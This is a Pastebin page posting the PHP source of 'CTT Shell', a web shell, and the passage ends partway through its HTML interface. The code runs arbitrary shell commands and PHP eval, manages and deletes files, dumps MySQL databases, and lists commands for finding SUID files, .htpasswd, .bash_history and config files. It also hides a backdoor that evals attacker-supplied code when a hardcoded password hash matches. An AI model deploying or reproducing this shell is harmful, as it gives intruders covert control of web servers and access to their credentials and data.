FlyFar

CTT Shell

Feb 9th, 2024
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 132.41 KB | Cybersecurity | 0 0
  1. <?php
  2. $timelimit = 60;
  3. $sul = "?";
  4. $rd = "./";
  5. $shver = "0.1";
  6. $login = "";
  7. $pass = "";
  8. $md5_pass = "";
  9. $login = false;
  10. $autoupdate = true;
  11. $updatenow = false;
  12. $autochmod = 755;
  13. $filestealth = 1;
  14. $donated_html = "";
  15. $donated_act = array("");
  16. $host_allow = array("*");
  17. $curdir = "./";
  18. $tmpdir = dirname(__FILE__);
  19. $ftypes  = array(
  20.  "html"=>array("html","htm","shtml"),
  21.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
  22.  "exe"=>array("sh","install","bat","cmd"),
  23.  "ini"=>array("ini","inf"),
  24.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
  25.  "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  26.  "sdb"=>array("sdb"),
  27.  "phpsess"=>array("sess"),
  28.  "download"=>array("exe","com","pif","src","lnk","zip","rar")
  29. );
  30. $hexdump_lines = 8;
  31. $hexdump_rows = 24;
  32. $nixpwdperpage = 9999;
  33. $bindport_pass = "ctt";
  34. $bindport_port = "11457";
  35. $aliases = array();
  36. $aliases[] = array("-----------------------------------------------------------", "ls -la");
  37. $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
  38. $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
  39. $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
  40. $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
  41. $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
  42. $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
  43.  $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
  44. $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
  45. $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
  46. $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
  47. $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
  48. $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
  49. $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
  50. $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
  51. $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
  52. $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
  53. $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
  54. $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
  55. $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
  56. $sess_method = "cookie";
  57. $sess_cookie = "ctshvars";
  58. if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
  59. $sess_file = $tmpdir."ctshvars_".$sid.".tmp";
  60. $usefsbuff = true;
  61. $copy_unset = false;
  62. $quicklaunch = array();
  63. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
  64. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
  65. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
  66. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
  67. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
  68. $quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
  69. $quicklaunch1 = array();
  70. $quicklaunch1[] = array("<b>��������</b>",$sul."act=ps_aux&d=%d");
  71. $quicklaunch1[] = array("<b>������</b>",$sul."act=lsa&d=%d");
  72. $quicklaunch1[] = array("<b>�������</b>",$sul."act=cmd&d=%d");
  73. $quicklaunch1[] = array("<b>��������</b>",$sul."act=upload&d=%d");
  74. $quicklaunch1[] = array("<b>����</b>",$sul."act=sql&d=%d");
  75. $quicklaunch1[] = array("<b>PHP-���</b>",$sul."act=eval&d=%d");
  76. $quicklaunch1[] = array("<b>PHP-����</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
  77. $quicklaunch1[] = array("<b>��� �������</b>",$sul."act=selfremove");
  78. $highlight_bg = "#FFFFFF";
  79. $highlight_comment = "#6A6A6A";
  80. $highlight_default = "#0000BB";
  81. $highlight_html = "#1300FF";
  82. $highlight_keyword = "#007700";
  83. @$f = $_GET[f];
  84. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  85. error_reporting(5);
  86. @ignore_user_abort(true);
  87. @set_magic_quotes_runtime(0);
  88. @set_time_limit(0);
  89. if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
  90. if(!ini_get("register_globals")) {import_request_variables("GPC");}
  91. $starttime = getmicrotime();
  92. if (get_magic_quotes_gpc())
  93. {
  94. if (!function_exists("strips"))
  95. {
  96.  function strips(&$el)
  97.  {
  98.   if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
  99.   else {$el = stripslashes($el);}
  100.  }
  101. }
  102. strips($GLOBALS);
  103. }
  104. $tmp = array();
  105. foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
  106. $s = "!^(".implode("|",$tmp).")$!i";
  107.  
  108.  
  109. if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
  110. elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
  111. if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
  112. {
  113.  header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
  114.  header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
  115.  exit;
  116. }  
  117.  
  118. $lastdir = realpath(".");
  119. chdir($curdir);
  120.  
  121. if (($selfwrite) or ($updatenow))
  122. {
  123.  if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
  124.  ctsh_getupdate();
  125.  $data = file_get_contents($ctsh_updatefurl);
  126.  $fp = fopen($data,"w");
  127.  fwrite($fp,$data);
  128.  fclose($fp);
  129.  exit;
  130. }
  131. if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
  132. if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
  133. else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
  134. if (!is_array($sess_data)) {$sess_data = array();}
  135. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  136. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  137. $sess_data["copy"] = array_unique($sess_data["copy"]);
  138. $sess_data["cut"] = array_unique($sess_data["cut"]);
  139.  
  140. if (!function_exists("ct_sess_put"))
  141. {
  142. function ct_sess_put($data)
  143. {
  144.  global $sess_method;
  145.  global $sess_cookie;
  146.  global $sess_file;
  147.  global $sess_data;
  148.  $sess_data = $data;
  149.  $data = serialize($data);
  150.  if ($sess_method == "file")
  151.  {
  152.   $fp = fopen($sess_file,"w");
  153.   fwrite($fp,$data);
  154.   fclose($fp);
  155.  }
  156.  else {setcookie($sess_cookie,$data);}
  157. }
  158. }
  159. if (!function_exists("str2mini"))
  160. {
  161. function str2mini($content,$len)
  162. {
  163.  if (strlen($content) > $len)
  164.  {
  165.   $len = ceil($len/2) - 2;
  166.   return substr($content, 0, $len)."...".substr($content, -$len);
  167.  }
  168.  else {return $content;}
  169. }
  170. }
  171. if (!function_exists("view_size"))
  172. {
  173. function view_size($size)
  174. {
  175.  if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
  176.  elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
  177.  elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
  178.  else {$size = $size . " B";}
  179.  return $size;
  180. }
  181. }
  182. if (!function_exists("fs_copy_dir"))
  183. {
  184. function fs_copy_dir($d,$t)
  185. {
  186.  $d = str_replace("\\","/",$d);
  187.  if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  188.  $h = opendir($d);
  189.  while ($o = readdir($h))
  190.  {
  191.   if (($o != ".") and ($o != ".."))
  192.   {
  193. if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  194. else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
  195. if (!$ret) {return $ret;}
  196.   }
  197.  }
  198.  return true;
  199. }
  200. }
  201. if (!function_exists("fs_copy_obj"))
  202. {
  203. function fs_copy_obj($d,$t)
  204. {
  205.  $d = str_replace("\\","/",$d);
  206.  $t = str_replace("\\","/",$t);
  207.  if (!is_dir($t)) {mkdir($t);}
  208.  if (is_dir($d))
  209.  {
  210.   if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  211.   if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  212.   return fs_copy_dir($d,$t);
  213.  }
  214.  elseif (is_file($d))
  215.  {
  216.  
  217.   return copy($d,$t);
  218.  }
  219.  else {return false;}
  220. }
  221. }
  222. if (!function_exists("fs_move_dir"))
  223. {
  224. function fs_move_dir($d,$t)
  225. {
  226.  error_reporting(9999);
  227.  $h = opendir($d);
  228.  if (!is_dir($t)) {mkdir($t);}
  229.  while ($o = readdir($h))
  230.  {
  231.   if (($o != ".") and ($o != ".."))
  232.   {
  233. $ret = true;
  234. if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  235. else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
  236. if (!$ret) {return $ret;}
  237.   }
  238.  }
  239.  return true;
  240. }
  241. }
  242. if (!function_exists("fs_move_obj"))
  243. {
  244. function fs_move_obj($d,$t)
  245. {
  246.  $d = str_replace("\\","/",$d);
  247.  $t = str_replace("\\","/",$t);
  248.  if (is_dir($d))
  249.  {
  250.   if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  251.   if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  252.   return fs_move_dir($d,$t);
  253.  }
  254.  elseif (is_file($d)) {return rename($d,$t);}
  255.  else {return false;}
  256. }
  257. }
  258. if (!function_exists("fs_rmdir"))
  259. {
  260. function fs_rmdir($d)
  261. {
  262.  $h = opendir($d);
  263.  while ($o = readdir($h))
  264.  {
  265.   if (($o != ".") and ($o != ".."))
  266.   {
  267. if (!is_dir($d.$o)) {unlink($d.$o);}
  268. else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
  269.   }
  270.  }
  271.  closedir($h);
  272.  rmdir($d);
  273.  return !is_dir($d);
  274. }
  275. }
  276. if (!function_exists("fs_rmobj"))
  277. {
  278. function fs_rmobj($o)
  279. {
  280.  $o = str_replace("\\","/",$o);
  281.  if (is_dir($o))
  282.  {
  283.   if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
  284.   return fs_rmdir($o);
  285.  }
  286.  elseif (is_file($o)) {return unlink($o);}
  287.  else {return false;}
  288. }
  289. }
  290. if (!function_exists("myshellexec"))
  291. {
  292.  function myshellexec($cmd)
  293.  {
  294.   return system($cmd);
  295.  }
  296. }
  297. if (!function_exists("view_perms"))
  298. {
  299. function view_perms($mode)
  300. {
  301.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  302.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  303.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  304.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  305.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  306.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  307.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  308.  else {$type = "?";}
  309.  
  310.  $owner['read'] = ($mode & 00400) ? "r" : "-";
  311.  $owner['write'] = ($mode & 00200) ? "w" : "-";
  312.  $owner['execute'] = ($mode & 00100) ? "x" : "-";
  313.  $group['read'] = ($mode & 00040) ? "r" : "-";
  314.  $group['write'] = ($mode & 00020) ? "w" : "-";
  315.  $group['execute'] = ($mode & 00010) ? "x" : "-";
  316.  $world['read'] = ($mode & 00004) ? "r" : "-";
  317.  $world['write'] = ($mode & 00002) ? "w" : "-";
  318.  $world['execute'] = ($mode & 00001) ? "x" : "-";
  319.  
  320.  if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
  321.  if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
  322.  if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
  323.  
  324.  return $type.$owner['read'].$owner['write'].$owner['execute'].
  325.   $group['read'].$group['write'].$group['execute'].
  326.   $world['read'].$world['write'].$world['execute'];
  327. }
  328. }
  329. if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
  330. if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
  331. if (!function_exists("ctsh_getupdate"))
  332. {
  333. function ctsh_getupdate()
  334. {
  335.  global $updatenow;
  336.  $data = @file_get_contents($ctsh_updatefurl);
  337.  if (!$data) {echo "Can't fetch update-information!";}
  338.  else
  339.  {
  340.   $data = unserialize(base64_decode($data));
  341.   if (!is_array($data)) {echo "Corrupted update-information!";}
  342.   else
  343.   {
  344. if ($cv < $data[cur]) {$updatenow = true;}
  345.   }
  346.  }
  347. }
  348. }
  349. if (!function_exists("mysql_dump"))
  350. {
  351. function mysql_dump($set)
  352. {
  353.  $sock = $set["sock"];
  354.  $db = $set["db"];
  355.  $print = $set["print"];
  356.  $nl2br = $set["nl2br"];
  357.  $file = $set["file"];
  358.  $add_drop = $set["add_drop"];
  359.  $tabs = $set["tabs"];
  360.  $onlytabs = $set["onlytabs"];
  361.  $ret = array();
  362.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  363.  if (empty($db)) {$db = "db";}
  364.  if (empty($print)) {$print = 0;}
  365.  if (empty($nl2br)) {$nl2br = true;}
  366.  if (empty($add_drop)) {$add_drop = true;}
  367.  if (empty($file))
  368.  {
  369.   global $win;
  370.   if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  371.   else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  372.  }
  373.  if (!is_array($tabs)) {$tabs = array();}
  374.  if (empty($add_drop)) {$add_drop = true;}
  375.  if (sizeof($tabs) == 0)
  376.  {
  377.  
  378.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  379.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  380.  }
  381.  global $SERVER_ADDR;
  382.  global $SERVER_NAME;
  383.  $out = "# Dumped by ctShell.SQL v. ".$cv."
  384. # Home page: http://.ru
  385. #
  386. # Host settings:
  387. # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
  388. # Date: ".date("d.m.Y H:i:s")."
  389. # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
  390. #---------------------------------------------------------
  391. ";
  392.  $c = count($onlytabs);
  393.  foreach($tabs as $tab)
  394.  {
  395.   if ((in_array($tab,$onlytabs)) or (!$c))
  396.   {
  397. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  398. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  399. if (!$res) {$ret[err][] = mysql_error();}
  400. else
  401. {
  402.  $row = mysql_fetch_row($res);
  403.  $out .= $row[1].";\n\n";
  404.  $res = mysql_query("SELECT * FROM `$tab`", $sock);
  405.  if (mysql_num_rows($res) > 0)
  406.  {
  407.   while ($row = mysql_fetch_assoc($res))
  408.   {
  409. $keys = implode("`, `", array_keys($row));
  410. $values = array_values($row);
  411. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  412. $values = implode("', '", $values);
  413. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  414. $out .= $sql;
  415.   }
  416.  }
  417. }
  418.   }
  419.  }
  420.  $out .= "#---------------------------------------------------------------------------------\n\n";
  421.  if ($file)
  422.  {
  423.   $fp = fopen($file, "w");
  424.   if (!$fp) {$ret[err][] = 2;}
  425.   else
  426.   {
  427. fwrite ($fp, $out);
  428. fclose ($fp);
  429.   }
  430.  }
  431.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  432.  return $ret;
  433. }
  434. }
  435. if (!function_exists("ctfsearch"))
  436. {
  437. function ctfsearch($d)
  438. {
  439.  global $found;
  440.  global $found_d;
  441.  global $found_f;
  442.  global $a;
  443.  if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  444.  $handle = opendir($d);
  445.  while ($f = readdir($handle))
  446.  {
  447.   $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
  448.   if($f != "." && $f != "..")
  449.   {
  450. if (is_dir($d.$f))
  451. {
  452.  if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
  453.  ctfsearch($d.$f);
  454. }
  455. else
  456. {
  457.  if ($true)
  458.  {
  459.   if (!empty($a[text]))
  460.   {
  461. $r = @file_get_contents($d.$f);
  462. if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
  463. if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
  464.  
  465. if ($a[text_regexp]) {$true = ereg($a[text],$r);}
  466. else {$true = strinstr($a[text],$r);}
  467. if ($a[text_not])
  468. {
  469.  if ($true) {$true = false;}
  470.  else {$true = true;}
  471. }
  472. if ($true) {$found[] = $d.$f; $found_f++;}
  473.   }
  474.   else {$found[] = $d.$f; $found_f++;}
  475.  }
  476. }
  477.   }
  478.  }
  479.  closedir($handle);
  480. }
  481. }
  482. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  483. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  484. header("Cache-Control: no-store, no-cache, must-revalidate");
  485. header("Cache-Control: post-check=0, pre-check=0", false);
  486. header("Pragma: no-cache");
  487.  
  488. global $SERVER_SOFTWARE;
  489. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
  490. else {$win = 0;}
  491.  
  492. if (empty($tmpdir))
  493. {
  494.  if (!$win) {$tmpdir = "/tmp/";}
  495.  else {$tmpdir = $_ENV[SystemRoot];}
  496. }
  497. $tmpdir = str_replace("\\","/",$tmpdir);
  498. if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
  499. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  500. {
  501.  $safemode = true;
  502.  $hsafemode = "<font color=\"red\">ON (secure)</font>";
  503. }
  504. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  505. $v = @ini_get("open_basedir");
  506. if ($v or strtolower($v) == "on")
  507. {
  508.  $openbasedir = true;
  509.  $hopenbasedir = "<font color=\"red\">".$v."</font>";
  510. }
  511. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  512.  
  513. $sort = htmlspecialchars($sort);
  514.  
  515. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
  516.  
  517. @ini_set("highlight.bg",$highlight_bg);
  518. @ini_set("highlight.comment",$highlight_comment);
  519. @ini_set("highlight.default",$highlight_default);
  520. @ini_set("highlight.html",$highlight_html);
  521. @ini_set("highlight.keyword",$highlight_keyword);
  522. @ini_set("highlight.string","#DD0000");
  523.  
  524. if ($act != "img")
  525. {
  526. if (!is_array($actbox)) {$actbox = array();}
  527. $dspact = $act = htmlspecialchars($act);
  528. $disp_fullpath = $ls_arr = $notls = null;
  529. $ud = urlencode($d);
  530. ?>
  531. <html>
  532. <head>
  533. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  534. <meta http-equiv="Content-Language" content="en-us"><title>
  535. CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
  536. <STYLE>
  537. tr {
  538. BORDER-RIGHT:  #aaaaaa 1px solid;
  539. BORDER-TOP: #eeeeee 1px solid;
  540. BORDER-LEFT:#eeeeee 1px solid;
  541. BORDER-BOTTOM: #aaaaaa 1px solid;
  542. }
  543. td {
  544. BORDER-RIGHT:  #105019 1px solid;
  545. BORDER-TOP: #000000 1px solid;
  546. BORDER-LEFT:#105019 1px solid;
  547. BORDER-BOTTOM: #105019 1px solid;
  548. }
  549. .tr2 {
  550. BORDER-RIGHT:  #aaaaaa 1px solid;
  551. BORDER-TOP: #eeeeee 1px solid;
  552. BORDER-LEFT:#eeeeee 1px solid;
  553. BORDER-BOTTOM: #aaaaaa 1px solid;
  554. }
  555. .td2 {
  556. BORDER-RIGHT:  #aaaaaa 1px solid;
  557. BORDER-TOP: #eeeeee 1px solid;
  558. BORDER-LEFT:#eeeeee 1px solid;
  559. BORDER-BOTTOM: #aaaaaa 1px solid;
  560. }
  561. .table1 {
  562. BORDER-RIGHT:  #cccccc 0px;
  563. BORDER-TOP: #cccccc 0px;
  564. BORDER-LEFT:#cccccc 0px;
  565. BORDER-BOTTOM: #cccccc 0px;
  566. BACKGROUND-COLOR: #D4D0C8;
  567. }
  568. .td1 {
  569. BORDER-RIGHT:  #000000 1px;
  570. BORDER-TOP: #cccccc 1px;
  571. BORDER-LEFT:#cccccc 1px;
  572. BORDER-BOTTOM: #000000 1px;
  573. font: 7pt Verdana;
  574. }
  575. .tds1 {
  576. BORDER-RIGHT:  #505050 1px solid;
  577. BORDER-TOP: #505050 1px solid;
  578. BORDER-LEFT:#505050 1px solid;
  579. BORDER-BOTTOM: #505050 1px solid;
  580. font: 8pt Verdana;
  581. }
  582. .tr1 {
  583. BORDER-RIGHT:  #cccccc 0px;
  584. BORDER-TOP: #cccccc 0px;
  585. BORDER-LEFT:#cccccc 0px;
  586. BORDER-BOTTOM: #cccccc 0px;
  587. }
  588. table {
  589. BORDER-RIGHT:  #000000 1px outset;
  590. BORDER-TOP: #000000 1px outset;
  591. BORDER-LEFT:#000000 1px outset;
  592. BORDER-BOTTOM: #000000 1px outset;
  593. BACKGROUND-COLOR: #000000;
  594. }
  595. .table2 {
  596. BORDER-RIGHT:  #000000 1px outset;
  597. BORDER-TOP: #000000 1px outset;
  598. BORDER-LEFT:#000000 1px outset;
  599. BORDER-BOTTOM: #000000 1px outset;
  600. BACKGROUND-COLOR: #D4D0C8;
  601. }
  602. input {
  603. BORDER-RIGHT:  #ffffff 1px solid;
  604. BORDER-TOP: #999999 1px solid;
  605. BORDER-LEFT:#999999 1px solid;
  606. BORDER-BOTTOM: #ffffff 1px solid;
  607. BACKGROUND-COLOR: #e4e0d8;
  608. font: 8pt Verdana;
  609. }
  610. select {
  611. BORDER-RIGHT:  #ffffff 1px solid;
  612. BORDER-TOP: #999999 1px solid;
  613. BORDER-LEFT:#999999 1px solid;
  614. BORDER-BOTTOM: #ffffff 1px solid;
  615. BACKGROUND-COLOR: #e4e0d8;
  616. font: 8pt Verdana;
  617. }
  618. submit {
  619. BORDER-RIGHT:  buttonhighlight 2px outset;
  620. BORDER-TOP: buttonhighlight 2px outset;
  621. BORDER-LEFT:buttonhighlight 2px outset;
  622. BORDER-BOTTOM: buttonhighlight 2px outset;
  623. BACKGROUND-COLOR: #e4e0d8;
  624. width: 30%;
  625. }
  626. textarea {
  627. BORDER-RIGHT:  #ffffff 1px solid;
  628. BORDER-TOP: #999999 1px solid;
  629. BORDER-LEFT:#999999 1px solid;
  630. BORDER-BOTTOM: #ffffff 1px solid;
  631. BACKGROUND-COLOR: #e4e0d8;
  632. font: Fixedsys bold;
  633. }
  634. BODY {
  635. margin-top: 1px;
  636. margin-right: 1px;
  637. margin-bottom: 1px;
  638. margin-left: 1px;
  639. }
  640. A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
  641. A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
  642. A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
  643. A:hover {color:blue;TEXT-DECORATION: none}
  644. </STYLE>
  645. <script language=JavaScript type=text/javascript>
  646. <!--
  647. function branchSwitch(branch) {
  648. dom = (document.getElementById);
  649. ie4 = (document.all);
  650. if (dom || ie4) {
  651. var currElement = (dom)? document.getElementById(branch) : document.all[branch];
  652. currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none';
  653. return false;
  654. }
  655. else return true;
  656. }
  657. //-->
  658. </script>
  659. </head>
  660. <BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
  661. <center>
  662. <br>
  663. <TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0>
  664. <TBODY><TR>
  665. <TD class=td1 colSpan=2>
  666. <TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0>
  667. <TBODY><TR>
  668. <TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD>
  669. <TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT>
  670. <FONT face=Tahoma color=#00ff3d size=1>
  671. <?
  672. $d = str_replace("\\","/",$d);
  673. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  674. $d = str_replace("\\","/",$d);
  675. if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  676. $dispd = htmlspecialchars($d);
  677. $pd = $e = explode("/",substr($d,0,strlen($d)-1));
  678. $i = 0;
  679. foreach($pd as $b)
  680. {
  681.  $t = "";
  682.  reset($e);
  683.  $j = 0;
  684.  foreach ($e as $r)
  685.  {
  686.   $t.= $r."/";
  687.   if ($j == $i) {break;}
  688.   $j++;
  689.  }
  690.  echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
  691.  $i++;
  692. }
  693. ?>
  694. </FONT></SPAN></TD>
  695. <TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD>
  696. <TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD>
  697. </TR></TBODY></TABLE></TD></TR>
  698. </tr>
  699. </table>
  700. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
  701. <tr><td>
  702. <font size=2><a href="#" onClick="return branchSwitch('tools')" title="��������">�����������</a></font> -
  703. <div id="tools" style="display: none">
  704. <?
  705. if (count($quicklaunch1) > 0)
  706. {
  707.  foreach($quicklaunch1 as $item)
  708.  {
  709.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  710.   $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
  711.   echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
  712.  }
  713. }
  714. ?>
  715. </div>
  716. <font size=2><a href="#" onClick="return branchSwitch('info')" title="��������">����������</a></font>
  717. <div id="info" style="display: none">
  718. <font size=2>
  719. <b>����������� �����������:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
  720. <b>�������:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
  721. &nbsp;<br>
  722. <b>������������:&nbsp;<?php echo $hsafemode; ?></b>
  723. <?
  724. echo "<br>";
  725. echo "������ ���: <b>".@phpversion()."</b>";
  726. echo "<br>";
  727. $curl_on = @function_exists('curl_version');
  728. echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
  729. echo "<br>";
  730. echo "MySQL: <b>";
  731. $mysql_on = @function_exists('mysql_connect');
  732. if($mysql_on){
  733. echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
  734. echo "<br>";
  735. echo "MSSQL: <b>";
  736. $mssql_on = @function_exists('mssql_connect');
  737. if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  738. echo "<br>";
  739. echo "PostgreSQL: <b>";
  740. $pg_on = @function_exists('pg_connect');
